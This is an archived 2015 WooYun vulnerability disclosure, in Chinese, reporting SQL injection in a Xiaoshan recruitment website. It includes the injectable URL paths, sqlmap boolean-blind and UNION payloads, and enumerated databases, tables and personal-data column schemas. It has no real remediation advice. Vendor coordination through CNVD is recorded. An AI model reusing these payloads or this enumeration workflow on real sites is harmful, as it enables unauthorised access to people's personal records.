当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140138

漏洞标题:萧山人才网注入漏洞(泄露几十万个人信息)

相关厂商:萧山人才网

漏洞作者: 泪雨无魂

提交时间:2015-09-12 12:02

修复时间:2015-10-30 08:14

公开时间:2015-10-30 08:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-12: 细节已通知厂商并且等待厂商处理中
2015-09-15: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-25: 细节向核心白帽子及相关领域专家公开
2015-10-05: 细节向普通白帽子公开
2015-10-15: 细节向实习白帽子公开
2015-10-30: 细节向公众公开

简要描述:

萧山人才网注入漏洞,导致泄露几十万用户的详细个人信息。。。。

详细说明:

注入点:
URL1 http://**.**.**.**/NewsListShow.aspx?Pid=19
URL2 http://**.**.**.**/ShowUnits.aspx?UnitsId=20131007111013404089
直接sqlmap 跑出各种数据。。。
用户信息量:
xshrLog | 2620660 |
ApplyDirJob |625962 |
PersonAssocBase | 249460 |
ApplyDirAddr | 382411 |

sqlmap identified the following injection points with a total of 0 HTTP(s) 
reque
sts:
---
Place: GET
Parameter: Pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Pid=19) AND 4486=4486 AND (1494=1494
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: Pid=-6717) UNION ALL SELECT 32,32,32,32,CHAR(58) CHAR(117)
CHAR(99)
CHAR(100) CHAR(58) CHAR(112) CHAR(86) CHAR(89) CHAR(68) CHAR(116) CHAR
(114) CHA
R(77) CHAR(119) CHAR(76) CHAR(98) CHAR(58) CHAR(115) CHAR(110) CHAR(107)
CHAR(58
),32,32,32,32,32--
---
[22:48:06] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[22:48:17] [INFO] retrieved: 10
[22:48:21] [INFO] retrieved: master
[22:48:40] [INFO] retrieved: model
[22:48:56] [INFO] retrieved: msdb
[22:49:10] [INFO] retrieved:Northwind
[22:50:00] [INFO] retrieved: pubs
[22:50:13] [INFO] retrieved: Rcpq_xshr
[22:50:41] [INFO] retrieved: tempdb
[22:51:00] [INFO] retrieved: xshr2007
[22:51:25] [INFO] retrieved: xshrBosom
[22:51:53] [INFO] retrieved: xsksDB_2014
available databases [10]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] Rcpq_xshr
[*] tempdb
[*] xshr2007
[*] xshrBosom
[*] xsksDB_2014
current database: 'xshr2007'
current user: 'xsrcsc2014Speed'


6.png


33.png


77.png


漏洞证明:

Database: xshr2007
[167 tables]
+-------------------------+
| Ad_gdgg |
| ApplyDirAddr |
| ApplyDirBase |
| ApplyDirJob |
| ApplySearch |
| ApplyTbl |
| ArtClass |
| ArtTemp |
| ArtTemplate |
| Article |
| CertProcess |
| ComUser |
| CompSeePerson |
| CompTemplate |
| CompanyAssocAppend |
| CompanyAssocBase |
| CompanyAssocParam |
| CompanyLimit |
| CompanyMenu |
| CompanyNews |
| CompanyProduct |
| EducationProcess |
| ElitePersonToJob |
| EmailArticle |
| ExamScore |
| FamilyMemProcess |
| Favorite |
| FileSearch |
| HTML_Address |
| HTML_AppearType |
| HTML_ApplyState |
| HTML_Article |
| HTML_AssocState |
| HTML_AssocTerm |
| HTML_AssocType |
| HTML_CertType |
| HTML_CompCharacter |
| HTML_CompTempType |
| HTML_CompanyAssocType |
| HTML_Degree |
| HTML_DriveState |
| HTML_EliteWork |
| HTML_HealthState |
| HTML_JobCallType |
| HTML_JobCharacter |
| HTML_JobState |
| HTML_JobTerm |
| HTML_JobType |
| HTML_KnowType |
| HTML_Language |
| HTML_LessonType |
| HTML_ManageType |
| HTML_MarrState |
| HTML_Nation |
| HTML_PaymentTerm |
| HTML_PersonAssocType |
| HTML_PolityType |
| HTML_ReqJobState |
| HTML_ReqJobType |
| HTML_SalaryReq |
| HTML_SalaryType |
| HTML_SchoolAssocType |
| HTML_SchoolLevel |
| HTML_SecrecyType |
| HTML_Specialty |
| HTML_TitleColor |
| HTML_TitleWord |
| HTML_TrainAssocType |
| HTML_WorkState |
| HoldSkill |
| HrArticle |
| HrClass |
| HrJb |
| HrMenber |
| Html_Booth |
| Html_BoothState |
| Html_CreateState |
| Html_PayState |
| Html_Place |
| Html_SiteState |
| InterviewLetter |
| Ip |
| Job |
| JxCompany |
| JxJob |
| JxPerson |
| LanguageAbility |
| LessonReport |
| ManageLimit |
| MatchJob |
| MatchJobSoon |
| NetworkSign |
| News |
| NewsClass |
| Online |
| OnlineRequest |
| Party_ArticleData |
| Party_Color |
| Party_Min |
| Party_Type |
| Party_Word |
| PaymentType |
| PerBazaar |
| PersonAssocAppend |
| PersonAssocBase |
| PersonAssocParam |
| PersonLimit |
| PersonMenu |
| PracticeProcess |
| RegAssoc |
| ReqAssoc |
| ReqCompanyData |
| ReqJob |
| RollArticle |
| SchoolAssocAppend |
| SchoolAssocBase |
| SchoolAssocParam |
| SchoolLimit |
| SchoolMenu |
| Screen |
| SearchPerson |
| Seeker |
| SendToEmail |
| SiteEnlist |
| SiteInfo |
| SiteJobs |
| SolicitArtClass |
| SolicitArticle |
| SoonAssocData |
| SoonAssocPayHistory |
| SoonAssocSeeRecord |
| SpecClass |
| SpeedManage |
| StudentReg |
| SuccessProcess |
| SysRcgc |
| SystemInfo |
| SystemMenu |
| SystemNote |
| Temp_PersonResumeOfSend |
| ToxshrMessage |
| TrainAndJob |
| TrainAssocAppend |
| TrainAssocBase |
| TrainAssocParam |
| TrainLesson |
| TrainLimit |
| TrainMenu |
| TrainProcess |
| TrainRequest |
| UnitsInternal |
| UnitsVideo |
| UpFileOfArt |
| VideoApplyData |
| VideoApplySearch |
| VideoData |
| VideoJob |
| WorkProcess |
| XshrDoorManage |
| data |
| dtproperties |
| idea |
| person |
| sysconstraints |
| syssegments |
| tb_person |
| xshrLog |
+-------------------------+
Database: xshr2007
Table: Job
[31 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| AddrId | int |
| AppearTypeId | int |
| AssocId | varchar |
| ComUserId | int |
| DegreeId | int |
| JobAgeEnd | int |
| JobAgeStart | int |
| JobCharId | int |
| JobClick | int |
| JobDelete | int |
| JobDesc | varchar |
| JobEmpCount | varchar |
| JobExam | varchar |
| JobGetMoney | varchar |
| JobId | int |
| JobLangReq | varchar |
| JobName | varchar |
| JobOrderTime | datetime |
| JobOtherReq | varchar |
| JobPubTime | datetime |
| JobSalary | varchar |
| JobSex | int |
| JobStateId | int |
| JobTermId | int |
| JobTop | int |
| JobTopTime | datetime |
| JobTreat | varchar |
| JobTypeId | int |
| LangId | int |
| MatchKey | varchar |
| WorkStateId | int |
+--------------+----------+
Database: xshr2007
Table: PersonAssocBase
[24 columns]
+-----------------+---------+
| Column | Type |
+-----------------+---------+
| AddrId | int |
| AssocId | varchar |
| CertTypeId | int |
| DriveStateId | int |
| EliteWorkID | int |
| HealthStateId | int |
| MarrStateId | int |
| NationId | int |
| PerAddr | varchar |
| PerBirthday | varchar |
| PerCertNumber | varchar |
| perGradeCertNum | varchar |
| PerHandset | varchar |
| PerHasHouse | bit |
| PerHeight | int |
| PerPhoto | varchar |
| PerPost | varchar |
| PerQQ | varchar |
| PerRealName | varchar |
| PerSex | bit |
| PerTel | varchar |
| PerWeb | varchar |
| PerWeight | int |
| PolityTypeId | int |
+-----------------+---------+


434.png


6.png


77.png


友情检测,不搞破坏。。。

修复方案:

你懂的。。。

版权声明:转载请注明来源 泪雨无魂@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-15 08:12

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论